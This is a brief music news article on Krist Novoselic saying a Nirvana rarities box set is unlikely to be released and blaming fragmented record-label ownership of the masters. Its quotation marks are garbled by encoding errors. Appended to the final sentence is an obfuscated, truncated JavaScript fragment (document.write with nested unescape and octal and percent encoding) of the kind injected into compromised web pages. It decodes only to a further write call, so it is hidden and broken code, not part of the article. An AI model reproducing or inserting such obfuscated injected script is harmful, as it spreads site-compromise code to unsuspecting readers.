While a new compilation DVD may be released in the future, former Nirvana bassist Krist Novoselic has stated he thinks it's very unlikely that the much touted Nirvana rarities box set will ever be released.
XFM reported, nearly 10 years after the suicide of Nirvana frontman Kurt Cobain, Novoselic explained that while there are unreleased tracks and recordings that could be made available, it's very difficult to arrange releasing it.
“That's a real process,†he said to the Chinook Observer, “There should be more stuff. There's been talk of a DVD because, thing is, there's not a lot of money in compact discs. It's hard to bootleg a DVD.â€
Comparing his band to an “international trade†the bassist puts the blame on the various fractured record companies who own the original master recording (the Geffen label Nirvana were originally signed to has been sold several times in the last few years).
“A lot of it has to do with the labels.†He continued, “You have to deal with people in New York and L.A., and then who owns it now? I think somebody in Brussels, Belgium or something.
“There's been so many different people and there's these huge corporate bureaucracies. It wasn't like when we [Nirvana] were just this band out of Aberdeen anymore.â€document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
